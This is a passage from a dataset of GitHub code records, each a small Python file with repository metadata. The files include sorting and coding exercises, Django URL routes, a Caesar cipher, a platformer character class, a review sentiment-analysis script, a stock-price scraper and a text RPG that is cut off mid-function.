\"course_id\": course_id,\n \"season\": season,\n \"year\": year,\n \"grade\": grade,\n \"unit\": unit\n })\n\n return courses_taken\n","repo_name":"ErrHu/15221-finalproject","sub_path":"audit/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"22863471964","text":"money_1lv = int(input())\nmoney_2lv = int(input())\nmoney_5lv = int(input())\nneeded_sum = int(input())\n\nfor leva01 in range(money_1lv + 1):\n for leva02 in range(money_2lv + 1):\n for leva05 in range(money_5lv + 1):\n if ((leva01 * 1) + (leva02 * 2) + (leva05 * 5)) == needed_sum:\n print(f\"{leva01} * 1 lv. + {leva02} * 2 lv. + {leva05} * 5 lv. = {needed_sum} lv.\")\n","repo_name":"qceka88/Basic-Python-May","sub_path":"06Nested_Loops/nested loops- more excersices/10profit.py","file_name":"10profit.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"95"} +{"seq_id":"26623723488","text":"'''\nImplementation of Merge Sort\n06/24/2018\n\nDo NOT return an array every time and then combine them.\nUse an empty and write the result into it to save space complexity.\n'''\n\ndef mergeSort(arr):\n\tif not len(arr):\n\t\treturn []\n\telse:\n\t\tresult = [0] * len(arr)\n\t\tsplit(arr, 0, len(arr) - 1, result)\n\t\treturn arr\n\ndef split(arr, low, high, result):\n\t#single element, return do not change anything\n\tif low >= high:\n\t\treturn\n\t#multiple element, continue\n\telse:\n\t\tmid = (low + high) // 2\n\t\tsplit(arr, low, mid, result)\n\t\tsplit(arr, mid + 1, high, result)\n\t\tmerge(arr, low, mid, high, result)\n\n\t\tfor i in range(low, high + 1):\n\t\t\tarr[i] = result[i]\n\n\tprint(\"low: {}, high: {}, result: {}\".format(low, high, result))\n\ndef merge(arr, low, mid, high, result):\n\ti = low\n\tj = mid + 1\n\tcount = low\t\n\n\twhile i <= mid and j <= high:\n\t\tif arr[i] < arr[j]:\n\t\t\tresult[count] = arr[i]\n\t\t\ti += 1\n\t\telse:\n\t\t\tresult[count] = arr[j]\n\t\t\tj += 1\n\t\tcount += 1\n\n\twhile i <= mid:\n\t\tresult[count] = arr[i]\n\t\tcount += 1\n\t\ti += 1\n\n\twhile j <= high:\n\t\tresult[count] = arr[j]\n\t\tcount += 1\n\t\tj += 1\n\n\nif __name__ == \"__main__\":\n\tinputList = input('Please enter a list of integers separated by comma(,): ')\n\tarr = [int(num) for num in inputList.split(',')]\n\tprint(\"The sorted result is {}\".format(mergeSort(arr)))","repo_name":"patrichu/CtCI-Exercises","sub_path":"00.Basic_Data_Structure_and_Algorithms/Sortings/merge_sort.py","file_name":"merge_sort.py","file_ext":"py","file_size_in_byte":1276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"18604136774","text":"from django.urls import path\nfrom .views import (\n EventListCreateView, \n EventRetrieveUpdateDestroyView, \n EventUserListCreateView,\n EventUserRetrieveUpdateDestroyView,\n SongRequestListView,\n SongRequestUpvoteView,\n SongRequestDeleteView,\n SongRequestCreateView,\n JoinEventByPIN,\n)\n\nurlpatterns = [\n path('', EventListCreateView.as_view(), name='event-list-create'), \n path('<int:pk>/', EventRetrieveUpdateDestroyView.as_view(), name='event-retrieve-update-destroy'), \n path('users/', EventUserListCreateView.as_view(), name='event-user-list-create'), \n path('users/<int:pk>/', EventUserRetrieveUpdateDestroyView.as_view(), name='event-user-retrieve-update-destroy'),\n path('song-requests/', 
SongRequestListView.as_view(), name='song-request-list-create'),\n path('song-requests/<int:pk>/', SongRequestDeleteView.as_view(), name='song-request-delete'),\n path('song-requests/create/', SongRequestCreateView.as_view(), name='song-request-create'),\n path('song-requests/<int:pk>/upvote/', SongRequestUpvoteView.as_view(), name='song-request-upvote'),\n path('join/', JoinEventByPIN.as_view(), name='join-event-by-pin'),\n]\n","repo_name":"NoahRamones/Kyoo","sub_path":"backend/KyooBackend/backend/events/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"72451671033","text":"from django.conf.urls import url, include\nfrom . import views\n\n\napp_name = 'positions'\nurlpatterns = [\n url(r'^overview/$', views.PositionListView.as_view(), name='index'),\n url(r'^add/$', views.add_position, name='add-position'),\n url(r'^(?P<pk>\\d+)-(?P<slug>[-\\w\\d]+)/', include([\n url(r'^detail/$', views.PositionDetailView.as_view(), name='position-detail'),\n url(r'^edit/$', views.edit_position, name='edit-position'),\n url(r'^delete/$', views.delete_position, name='delete-position'),\n ])),\n]\n","repo_name":"dsawali/Co-Up","sub_path":"coup/positions/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"18252456937","text":"class Solution:\n def hammingDistance(self, x, y):\n \"\"\"\n :type x: int\n :type y: int\n :rtype: int\n \"\"\"\n a = \"{0:031b}\".format(x)\n b = \"{0:031b}\".format(y)\n\n diff = 0\n print(a, b)\n for i, j in zip(a, b):\n print(i, j)\n if i != j:\n diff += 1\n\n return diff\n\n \ns = Solution()\n\nx, y = 1, 2\nprint(s.hammingDistance(x, y))\n\n\n","repo_name":"desertSniper87/monorepo","sub_path":"leetcode/hamming-distance.py","file_name":"hamming-distance.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"95"} +{"seq_id":"22793443247","text":"#\n# CAESAR CIPHER - PART 1\n# The basic cipher\n#\n# Standard Caesar Cipher where the user adds a message and cipher key\n# The message is encoded according to the key in relation to the alphabet\n#\n# There are some obvious issues with this cipher. What are they?\n#\n#\n\nalphabet = 'abcdefghijklmnopqrstuvwxyz' # The alphabet which the cypher will use for encoding\nnewMessage = '' # Initialise the message variable\n\nmessage = input('Please enter a messsage: ')\n# The key is the number of steps along the alphabet the program will step \n# when encrypting the message. 
A key of 3 for example would turn the letter\n# 'c' into 'f'\ntheKey = int(input('Please enter your key: ')) \n\nfor character in message:\n if character in alphabet:\n position = alphabet.find(character)\n newPosition = (position + theKey)%26\n newCharacter = alphabet[newPosition]\n newMessage += newCharacter\n else:\n newMessage += character # line to handle a character which isn't in the alphabet variable\n\nprint('Your new message is: ', newMessage)\n","repo_name":"SheyMouse/caesar-cipher","sub_path":"caesarcipher_01.py","file_name":"caesarcipher_01.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"26254383661","text":"import game_framework\nfrom pico2d import *\n\nfrom load_map import map_list\n\n# Boy Run Speed\nPIXEL_PER_METER = (10.0 / 0.3)\nRUN_SPEED_KMPH = 40.0\nRUN_SPEED_MPM = (RUN_SPEED_KMPH * 1000.0/60.0)\nRUN_SPEED_MPS = (RUN_SPEED_MPM / 60.0)\nRUN_SPEED_PPS = (RUN_SPEED_MPS * PIXEL_PER_METER)\n\n# Boy Action Speed\n# fill expressions correctly\nTIME_PER_ACTION = 0.5\nACTION_PER_TIME = 1.0 / TIME_PER_ACTION\nFRAMES_PER_ACTION = 8\n\n# John Event\nRIGHT_DOWN, LEFT_DOWN, RIGHT_UP, LEFT_UP, UP_DOWN, UP_UP = range(6)\n\nkey_event_table = {\n (SDL_KEYDOWN, SDLK_RIGHT): RIGHT_DOWN,\n (SDL_KEYDOWN, SDLK_LEFT): LEFT_DOWN,\n (SDL_KEYUP, SDLK_RIGHT): RIGHT_UP,\n (SDL_KEYUP, SDLK_LEFT): LEFT_UP,\n (SDL_KEYDOWN, SDLK_UP): UP_DOWN,\n (SDL_KEYUP, SDLK_UP): UP_UP\n}\n\ngravity = 0.03\n\n\ndef blk(y, x):\n # left,up,right,down\n return 120*x, 1080-120*y, 120*(x+1), 960 - 120*y\n\n\n# John States\nclass IdleState:\n\n @staticmethod\n def enter(John, event):\n if event == RIGHT_DOWN:\n John.velocity += RUN_SPEED_PPS\n elif event == LEFT_DOWN:\n John.velocity -= RUN_SPEED_PPS\n elif event == RIGHT_UP:\n John.velocity -= RUN_SPEED_PPS\n elif event == LEFT_UP:\n John.velocity += RUN_SPEED_PPS\n elif event == UP_DOWN:\n if John.y2 == John.y:\n John.jump = 4.0\n elif event == UP_UP:\n if John.jump > 0.0:\n John.jump = 0.0\n\n @staticmethod\n def exit(John, event):\n # fill here\n pass\n\n @staticmethod\n def do(John):\n John.y2 = John.y\n John.frame = (John.frame + FRAMES_PER_ACTION*ACTION_PER_TIME*game_framework.frame_time) % 8\n John.y = John.y + John.jump\n #John.y = clamp(150.0, John.y, 1200.0)\n John.jump = John.jump - gravity*game_framework.frame_time\n John.jump = clamp(-30.0, John.jump, 4.0)\n John.left, John.up, John.right, John.down = John.x - 15, John.y + 30, John.x + 15, John.y - 30\n\n for i in range(0,9):\n for j in range(0,16):\n if map_list[i][j] == 1:\n left, up, right, down = blk(i, j)\n # UP collision check\n if John.up > down and John.up < up:\n if John.right > left and John.right < right or \\\n John.left < right and John.left > left:\n John.y = John.y2\n John.jump = 0.0\n # DOWN collision check\n elif John.down < up and John.up > up:\n if John.right > left and John.right < right or \\\n John.left < right and John.left > left:\n John.y = John.y2\n John.jump = 0.0\n # LEFT collision check\n if John.left < right and John.left > left:\n if John.up > down and John.up < up or \\\n John.down < up and John.down > down:\n John.x = John.x2\n # RIGHT collision check\n elif John.right > left and John.right < right:\n if John.up > down and John.up < up or \\\n John.down < up and John.down > down:\n John.x = John.x2\n\n\n\n\n @staticmethod\n def draw(John):\n if John.dir == 1:\n John.image.clip_draw(int(John.frame) * 100, 300, 100, 100, John.x, John.y)\n else:\n 
John.image.clip_draw(int(John.frame) * 100, 200, 100, 100, John.x, John.y)\n\n\nclass RunState:\n\n @staticmethod\n def enter(John, event):\n if event == RIGHT_DOWN:\n John.velocity += RUN_SPEED_PPS\n elif event == LEFT_DOWN:\n John.velocity -= RUN_SPEED_PPS\n elif event == RIGHT_UP:\n John.velocity -= RUN_SPEED_PPS\n elif event == LEFT_UP:\n John.velocity += RUN_SPEED_PPS\n elif event == UP_DOWN:\n if John.y2 == John.y:\n John.jump = 4.0\n elif event == UP_UP:\n if John.jump > 0.0:\n John.jump = 0.0\n John.dir = John.velocity\n John.dir = clamp(-1, John.velocity, 1)\n\n @staticmethod\n def exit(John, event):\n pass\n\n @staticmethod\n def do(John):\n John.y2 = John.y\n John.x2 = John.x\n John.frame = (John.frame + FRAMES_PER_ACTION*ACTION_PER_TIME*game_framework.frame_time) % 8\n John.x += John.velocity * game_framework.frame_time\n John.x = clamp(25, John.x, 1920 - 25)\n John.y += John.jump\n #John.y = clamp(150.0, John.y, 1200.0)\n John.jump -= gravity\n John.jump = clamp(-30.0, John.jump, 4.0)\n John.left, John.up, John.right, John.down = John.x - 15, John.y + 30, John.x + 15, John.y - 30\n\n for i in range(0, 9):\n for j in range(0, 16):\n if map_list[i][j] == 1:\n left, up, right, down = blk(i, j)\n # UP collision check\n if John.up > down and John.up < up:\n if John.right > left and John.right < right or \\\n John.left < right and John.left > left:\n John.y = John.y2\n John.jump = 0.0\n # DOWN collision check\n elif John.down < up and John.up > up:\n if John.right > left and John.right < right or \\\n John.left < right and John.left > left:\n John.y = John.y2\n John.jump = 0.0\n # LEFT collision check\n if John.left < right and John.left > left:\n if John.up > down and John.up < up or \\\n John.down < up and John.down > down:\n John.x = John.x2\n # RIGHT collision check\n elif John.right > left and John.right < right:\n if John.up > down and John.up < up or \\\n John.down < up and John.down > down:\n John.x = John.x2\n\n\n @staticmethod\n def draw(John):\n if John.dir == 1:\n John.image.clip_draw(int(John.frame) * 100, 100, 100, 100, John.x, John.y)\n else:\n John.image.clip_draw(int(John.frame) * 100, 0, 100, 100, John.x, John.y)\n\n\nnext_state_table = {\n IdleState: {RIGHT_UP: RunState, LEFT_UP: RunState, RIGHT_DOWN: RunState, LEFT_DOWN: RunState, UP_DOWN: IdleState,\n UP_UP: IdleState},\n RunState: {RIGHT_UP: IdleState, LEFT_UP: IdleState, LEFT_DOWN: IdleState, RIGHT_DOWN: IdleState, UP_DOWN: RunState,\n UP_UP: RunState}\n}\n\n\nclass John:\n\n def __init__(self):\n self.x, self.y = 100, 300\n self.x2, self.y2 = 100, 300\n self.left, self.up, self.right, self.down = self.x - 15, self.y + 30, self.x +15, self.y - 30\n self.image = load_image('animation_sheet.png')\n self.dir = 1\n self.velocity = 0\n self.frame = 0\n self.jump = 0\n self.jump_toggle = True\n self.event_que = []\n self.cur_state = IdleState\n self.cur_state.enter(self, None)\n\n def add_event(self, event):\n self.event_que.insert(0, event)\n\n def update(self):\n self.cur_state.do(self)\n if len(self.event_que) > 0:\n event = self.event_que.pop()\n self.cur_state.exit(self, event)\n self.cur_state = next_state_table[self.cur_state][event]\n self.cur_state.enter(self, event)\n\n def draw(self):\n self.cur_state.draw(self)\n\n def handle_event(self, event):\n if (event.type, event.key) in key_event_table:\n key_event = key_event_table[(event.type, event.key)]\n self.add_event(key_event)","repo_name":"JaeHwi-Kwon/2DGP","sub_path":"2DGP 게임 
프로젝트/John.py","file_name":"John.py","file_ext":"py","file_size_in_byte":7954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"16328558178","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Jul 12 19:00:05 2021\r\n\r\n@author: MRITYUNJAY\r\nSentimental Analysis on ISEGlobal\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\ndata = pd.read_csv('finalData.csv')\r\ndata.columns\r\ndata.drop('Unnamed: 0', inplace = True, axis = 1)\r\ndata.groupby('Platform').describe()\r\ndata\r\ndata.drop_duplicates(keep = 'first', inplace = True, ignore_index = True)\r\n\r\n#Converting to lower text\r\nclean_text = [i.lower() for i in data['Content (Reviews and Tweets)']]\r\n\r\n\r\n#Tokenize\r\n#sentence tokenize\r\nfrom nltk.tokenize import sent_tokenize, word_tokenize\r\nimport nltk\r\nsent_tok = []\r\nfor sent in clean_text:\r\n sent = sent_tokenize(sent)\r\n sent_tok.append(sent)\r\nsent_tok\r\n\r\n#word tokenize\r\nclean_text_2 = [word_tokenize(i) for i in clean_text]\r\nclean_text_2\r\n\r\n#remove punctuations\r\nimport re\r\nclean_text_3 = []\r\nfor words in clean_text_2:\r\n clean = []\r\n for word in words:\r\n res = re.sub(r'[^\\w\\s]', \"\", word)\r\n if(res != \"\"):\r\n clean.append(res)\r\n clean_text_3.append(clean)\r\nclean_text_3\r\n\r\n#remove Stopwords\r\nnltk.download('stopwords')\r\nfrom nltk.corpus import stopwords\r\n\r\nclean_text_4 = []\r\nfor words in clean_text_3:\r\n clean = []\r\n for word in words:\r\n if not word in stopwords.words('english'):\r\n clean.append(word)\r\n clean_text_4.append(clean)\r\nclean_text_4\r\n\r\n#Stemming - removing the ings, ed, s etc to bring word back to its root form\r\nfrom nltk.stem.snowball import SnowballStemmer\r\nfrom nltk.stem.wordnet import WordNetLemmatizer\r\nnltk.download('wordnet')\r\nlemma = WordNetLemmatizer()\r\nstemm = SnowballStemmer('english')\r\n\r\n#Just showing uses for my own sake\r\na = [stemm.stem(i) for i in ['reading', 'washing', 'driving', 'drive']]\r\nb = [lemma.lemmatize(i, 'v') for i in ['reading', 'washing', 'driving', 'cooking']] \r\nb\r\n\r\nclean_text_5 = []\r\nfor words in clean_text_4:\r\n clean = []\r\n for word in words:\r\n w_stemmed = stemm.stem(word)\r\n clean.append(w_stemmed)\r\n clean_text_5.append(clean)\r\n \r\nclean_text_5\r\n\r\n#Lemmatization\r\nfrom nltk.stem.wordnet import WordNetLemmatizer\r\nnltk.download('wordnet')\r\nlemma = WordNetLemmatizer()\r\n\r\nlem = []\r\nfor words in clean_text_4:\r\n clean = []\r\n for word in words:\r\n w_lemma = lemma.lemmatize(word)\r\n clean.append(w_lemma)\r\n lem.append(clean)\r\nlem\r\n\r\n#Vectorization\r\nfrom sklearn.feature_extraction.text import CountVectorizer\r\ncv = CountVectorizer(ngram_range=(1,2))\r\nX_vec = [cv.fit_transform(i).toarray() for i in lem]\r\nX_vec\r\nprint(cv.get_feature_names())\r\n\r\n#Get Test Value.. 
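e.g. a single held-out review.\r\n# A minimal sketch (hypothetical names; assumes one CountVectorizer fit once on the whole corpus rather than refit per document):\r\n# new_review = \"the course content was excellent\"\r\n# new_vec = cv.transform([new_review]).toarray()\r\n# 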
Similarily perform Vectorization on that value.\r\n\r\n#Sentiment Ananlysis\r\n\r\n#!pip install vaderSentiment textblob\r\nfrom vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer\r\nfrom textblob import TextBlob\r\nlem\r\n\r\n#Using TextBlob\r\nanalysis = [TextBlob(i) for i in data['Content (Reviews and Tweets)']]\r\nanalysis\r\nanalysis[0].tags\r\nsentiment_1 = [i.sentiment for i in analysis]\r\ndata['Content (Reviews and Tweets)'][0]\r\npolarity = [i.polarity for i in sentiment_1]\r\nsubjectivity = [i.subjectivity for i in sentiment_1]\r\npolarity, subjectivity\r\nsentiment_data = data \r\nlen(polarity)\r\nlen(subjectivity)\r\ndata['polarity'] = polarity\r\ndata['subjectivity'] = subjectivity \r\npd.set_option('max_rows', 25)\r\ndata[['Content (Reviews and Tweets)', 'polarity']].groupby('polarity').head(25)\r\ndata[data['polarity'] < 0]['Content (Reviews and Tweets)'].tail(25)\r\ndata.to_csv('TextBlobSentiment.csv')\r\n\r\nsm = SentimentIntensityAnalyzer()\r\nsentiment = [TextBlob.sentiment(i) for i in lem]\r\n\r\n#Using VaderSentiment\r\nvader = SentimentIntensityAnalyzer()\r\nanalysis = [vader.polarity_scores(i) for i in data['Content (Reviews and Tweets)']]\r\ndf_analysis = pd.DataFrame(analysis)\r\ndt_new = pd.concat([data, df_analysis], axis=1)\r\ndt_new.to_csv('ISELVaderAnalysis.csv')\r\n\r\n\r\nthreshhold = 0.5\r\n\r\ndef emotion_detect(field):\r\n sentiment = []\r\n for i in field:\r\n if i >= threshhold :\r\n sentiment.append(\"Positive\")\r\n elif i <= - threshhold :\r\n sentiment.append(\"Negative\")\r\n else :\r\n sentiment.append(\"Neutral\")\r\n return sentiment\r\n \r\ndt_new['Sentiment'] = emotion_detect(dt_new['compound'])\r\ndt_new.to_csv('ISELVaderAnalysis.csv')\r\n\r\ndef top_n_reviews(df, data_column, number_of_rows, type_of_review):\r\n print(f\"Top {type_of_review} Comments:\")\r\n for index, row in df.nlargest(number_of_rows, data_column).iterrows():\r\n print(f\"Score: {row[data_column]}, Review: {row[1]}\")\r\n \r\n\r\ntop_n_reviews(dt_new, 'pos', 15, \"Positive\")\r\ntop_n_reviews(dt_new, 'neg', 15, \"Negative\" ) \r\n\r\n#what are the courses available\r\nise = pd.read_csv('iselglobal_website.csv')\r\nise.columns\r\ncourses = ise['rv-course 2'].unique()\r\ncourses = courses[~pd.isnull(courses)]\r\ncourses = list(courses)\r\ncourses = [i.lower() for i in courses]\r\ncourses\r\ncourses = [i.replace(\"certification\", \"\") for i in courses]\r\nlem = pd.Series(lem)\r\nab = pd.concat([lem, data['Content (Reviews and Tweets)']], axis = 1)\r\nab.to_csv('cleaned_words.csv')\r\n\r\n","repo_name":"Mritunjay1729/HH-Internships","sub_path":"finalSentimentalAnalysis.py","file_name":"finalSentimentalAnalysis.py","file_ext":"py","file_size_in_byte":5106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"13267935305","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\nimport openpyxl\r\n\r\nfpath = r'C:\\Users\\o9707\\Desktop\\대학교\\inflearn\\crawling\\기본편\\02.네이버_주식현재가\\참가자_data.xlsx'\r\nwb = openpyxl.load_workbook(fpath)\r\nws = wb.active # 현재 활성화된 시트 선택(기본시트)\r\n\r\ncodes = [\r\n '005930',\r\n '000660',\r\n '035720',\r\n]\r\n\r\nrow = 4\r\nfor code in codes:\r\n url = f\"https://finance.naver.com/item/sise.naver?code={code}\"\r\n response = requests.get(url)\r\n html = response.text\r\n soup = BeautifulSoup(html, 'html.parser')\r\n price = soup.select_one(\"#_nowVal\").text\r\n price = price.replace(',','')\r\n print(f\"code : {code}, price : {price}\")\r\n ws[f'A{row}'] = int(price)\r\n row 
+=1\r\n\r\nwb.save(fpath)","repo_name":"osm8485/Crawling_study","sub_path":"기본편/02.네이버_주식현재가/04.주식현재가 크롤링.py","file_name":"04.주식현재가 크롤링.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"10648270734","text":"n = int(input('Number of skates: '))\nskates = []\n\nfor i in range(n):\n    print('Size of pair', i + 1, ':', end=' ')\n    skate_size = int(input())\n    skates.append(skate_size)\n\nk = int(input('\\nNumber of people: '))\npeople = []\n\nfor j in range(k):\n    print('Foot size of person', j + 1, ':', end=' ')\n    foot_size = int(input())\n    people.append(foot_size)\n\n# sort both lists so the greedy pass below gives each person the smallest skate that fits;\n# on unsorted input this loop can undercount the true maximum\nskates.sort()\npeople.sort()\ncount = 0\n\nfor i_people in people:\n    for j_skates in range(len(skates)):\n        if skates[j_skates] >= i_people:\n            skates.remove(skates[j_skates])\n            count += 1\n            break\n\nprint('\\nMaximum number of people who can take the skates:', count)\n","repo_name":"StanleyOspin/Python_Basic","sub_path":"Module16/07_roller_skates/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"43905531511","text":"\nimport random\nimport time\nfrom enum import Enum\n#ToDo - write a CAPS program to capitalize all input so that it doesn't matter how they enter their name or make things one letter to select. \n#ToDo - Make validators into functions, make input into function with min and max acceptance stuff\n#ToDo - Turn hpPotions into a bonus life in combat \nWeapon = Enum(\"Weapon\", \"Longsword, Warhammer, Spear\")\nSpell = Enum(\"Spells\", \"Fireball, IceStorm, LightningBolt\")\nTool = Enum(\"Tools\", \"Lockpick, GrapplingHook, \" )\nShield = Enum(\"Defense\",\"Shield, ChainMail, Cloak\")\nResistance = Enum(\"Resistance\",\"MagicShield, RingOfProtection, Counterspell\")\nWeapons = {}\nSpells = {}\nTools = {}\nShields = {}\nResistances = {}\nWeapons[\"Fist\"] = {\"Name\": \"Fist\", \"dmgBonus\": 2, \"dmgType\": \"Bludgeoning\"}\nWeapons[\"BatFist\"] = {\"Name\": \"BatFist\", \"dmgBonus\": 50, \"dmgType\": \"Kill\"}\nWeapons[\"TrollMace\"] = {\"Name\": \"TrollMace\", \"dmgBonus\": 20, \"dmgType\": \"Bludgeoning\"}\nWeapons[\"Longsword\"] = {\"Name\": \"Longsword\",\"dmgBonus\": 5, \"dmgType\": \"Slashing\"}\nWeapons[\"Warhammer\"] = {\"Name\": \"Warhammer\",\"dmgBonus\": 5, \"dmgType\": \"Bludgeoning\"}\nWeapons[\"Spear\"] = {\"Name\": \"Spear\",\"dmgBonus\": 5, \"dmgType\": \"Piercing\"}\nWeapons[\"ObsidianEdge\"] = {\"Name\": \"Obsidian edge\",\"dmgBonus\": 15, \"dmgType\": [\"Slashing\", \"Fire\"]}\nSpells[\"Fireball\"] = {\"Name\": \"Fire ball\",\"dmgBonus\": 10, \"dmgType\": \"Fire\"}\nSpells[\"IceStorm\"] = {\"Name\": \"Ice storm\",\"dmgBonus\": 10, \"dmgType\": \"Cold\"}\nSpells[\"LightningBolt\"] = {\"Name\": \"Lightning bolt\",\"dmgBonus\": 15, \"dmgType\": \"Lightning\"}\nSpells[\"EclipticBeam\"] = {\"Name\": \"Ecliptic beam\",\"dmgBonus\": 35, \"dmgType\": \"Dark\"}\nSpells[\"NoMagic\"] = {\"Name\": \"No Magic for you\", \"dmgBonus\": 2, \"dmgType\": \"Bad\"}\n\ndef checkForDead():\n    if player.hp <= 0 and player.hpPotions > 0:\n        print(\"Thankfully just as you're about to fall you manage to take a swig of that potion you found. Returning some hp.\")\n        player.hp = player.hp + .5 * player.maxhp\n    elif player.hp <= 0:\n        print(\"You Have Died\")\n        print(\"Play again? 
y/n\")\n userInput = input()\n if userInput == \"y\":\n playeracterSelect()\n else:\n quit()\n else:\n pass\n\ndef levelUp():\n if player.xp >= 10 * player.lvl:\n player.xp -= 10 * player.lvl\n increases = 0\n print(\"Level up!\")\n player.maxhp += 10\n player.lvl += 1\n calcStats()\n printStats()\n print(\"Choose two stats to increase by 2\")\n ##stats = [\"strength\",\"dexterity\",\"constitution\",\"intelligence\",\"wisdom\"] <- in case some particular slimmer code doesn't work\n print(f\"1: Strength\")\n print(f\"2: Dexterity\")\n print(f\"3: Constitution\")\n print(f\"4: Intelligence\")\n print(f\"5: Wisdom\")\n while increases < 2:\n print(\"Type the number of the stat you wish to increase\")\n userChoice = int(input())\n if userChoice == 1:\n player.strength +=2\n print(\"Strength + 2!\")\n increases += 1\n elif userChoice == 2:\n player.dexterity +=2\n print(\"Dexterity + 2!\")\n increases += 1\n elif userChoice == 3:\n player.constitution +=2\n print(\"Constitution + 2!\")\n increases += 1\n elif userChoice == 4:\n player.intelligence +=2\n print(\"Intelligence + 2!\")\n increases += 1\n elif userChoice == 5:\n player.wisdom +=2\n print(\"Wisdom + 2!\")\n increases += 1\n else:\n print(\"please enter a number 1-5\")\n calcStats()\n player.hp = player.maxhp\n print(\"You feel invigorated by your level up. Health restored!\")\n levelUp()\n else:\n pass\n#toDo - Make a printStats functions to display stats, and a calcStats to reintialize stats\ndef calcStats():\n player.conModifier = player.constitution/10\n player.maxhp = player.maxhp*player.conModifier\n if player.race == \"Warrior\":\n player.dmg = 10 + player.strength + player.weapon[\"dmgBonus\"]\n player.dmgType = player.weapon[\"dmgType\"]\n elif player.race == \"Rogue\":\n player.dmg = 10 + player.dexterity + player.weapon[\"dmgBonus\"]\n player.dmgType = player.weapon[\"dmgType\"]\n elif player.race == \"Wizard\":\n player.dmg = 10 + player.intelligence + player.spell[\"dmgBonus\"]\n player.dmgType = player.spell[\"dmgType\"]\n player.critMultiplier = player.dexterity/5\n\ndef printStats():\n print(f\"\"\"\n\n Adventurer:{player.name} the lvl {player.lvl} {player.race}\n\n Max HP:{player.maxhp} -- How many hits you can take\n\n Strength: {player.strength} -- Affects warrior dmg and your ability to complete tasks of heft\n\n Dexterity:{player.dexterity} -- Affects rogue dmg and your ability to complete mobility based feats and increases your crit dmg\n\n Constitution:{player.constitution} -- Affects your max HP and resistance to some attacks\n\n Intelligence:{player.intelligence} -- Affects wizard dmg and understanding of things\n\n Wisdom:{player.wisdom} -- Affects perception and noticing secrets\n\n Weapon:{player.weapon['Name']} -- Affects your dmg type and amount\n\n Shield:{player.shield} -- Blocks physical damage\n\n Tool:{player.tool} -- Situational items\n\n Spell:{player.spell['Name']} -- Decides damage type and power of the mage, some noncombat use\n\n Resistance:{player.resistance} -- Provides blocking power against magic\n\n Damage:{player.dmg} -- Base damage before rolls and calculations, decided by your main stat\n\n Damage Type:{player.dmgType} -- Decided by your main method of attack, some enemies are weaker or stronger against specific types of dmg\n\n XP:{player.xp} -- Counts experience total until next level up, XP requirement is your level * 10\n\n Damage Stop:{player.dmgStop} -- Blocks a flat amount of damage, provided by advanced defensive items\n\n Damage Bonus:{player.dmgBonus} -- Additional damage 
added onto your base before calculations, added by your weapon or spell\n\n Constitution Modifier:{player.conModifier} -- Your constitution/10, multiplies into your max hp\n\n Crit Multiplier:{player.critMultiplier} -- Your dexterity/5, increases your critical hit damage mildly increases likelihood\n \"\"\")\n \n#Should allow players to select their class, altering their base stats and equipment.\nclass char:\n def __init__(self, race, name, hp, strength, dexterity, constitution, intelligence, wisdom,):\n self.name = name \n self.race = race\n self.maxhp = hp\n self.hp = hp\n self.strength = strength\n self.dexterity = dexterity\n self.constitution = constitution\n self.intelligence = intelligence\n self.wisdom = wisdom\n self.weapon = Weapons[\"Fist\"] \n self.shield = None \n self.tool = None \n self.spell = Spells[\"NoMagic\"]\n self.resistance = None \n self.dmg = 10\n self.dmgType = None\n self.xp = 0 \n self.dmgStop = 0 \n self.dmgBonus = 0\n self.lvl = 1\n self.conModifier = self.constitution/10\n self.maxhp = self.maxhp*self.conModifier\n self.critMultiplier = self.dexterity/5\n self.hpPotions = 0\n## toDo - write a simple level up function that checks xp and then allows them to choose some stat increases and increases their HP\n## toDo - make a calculate function that adds up damage and stats before fights to make things more progressive, con is a modifier to HP\n## toDo - make it so weapons affect your dmg bonus, not dmg and thus don't stack\n def __str__(self):\n return f\"{self.race}{self.weapon}{self.shield}{self.tool}{self.spell}{self.resistance}{self.dmgType}{self.name}()\"\n def selectThings(self):\n if self.race == \"Warrior\":\n weapons = [f\"{weapon.value}-{weapon.name}\" for weapon in Weapon]\n weapons = \", \".join(weapons[:-1]) + \" or \" + weapons[-1]\n choice = int(input(f\"Choose your weapon {weapons}: \"))\n self.weapon = Weapon(choice)\n if self.weapon == Weapon.Warhammer:\n self.weapon = Weapons[\"Warhammer\"]\n self.dmgType = self.weapon[\"dmgType\"]\n self.dmgBonus = self.weapon[\"dmgBonus\"]\n if self.weapon == Weapon.Longsword:\n self.weapon = Weapons[\"Longsword\"]\n self.dmgType = self.weapon[\"dmgType\"]\n self.dmgBonus = self.weapon[\"dmgBonus\"]\n if self.weapon == Weapon.Spear: \n self.weapon = Weapons[\"Spear\"]\n self.dmgType = self.weapon[\"dmgType\"]\n self.dmgBonus = self.weapon[\"dmgBonus\"]\n shields = [f\"{shield.value}-{shield.name}\" for shield in Shield]\n shields = \", \".join(shields[:-1]) + \" or \" + shields[-1]\n choice = 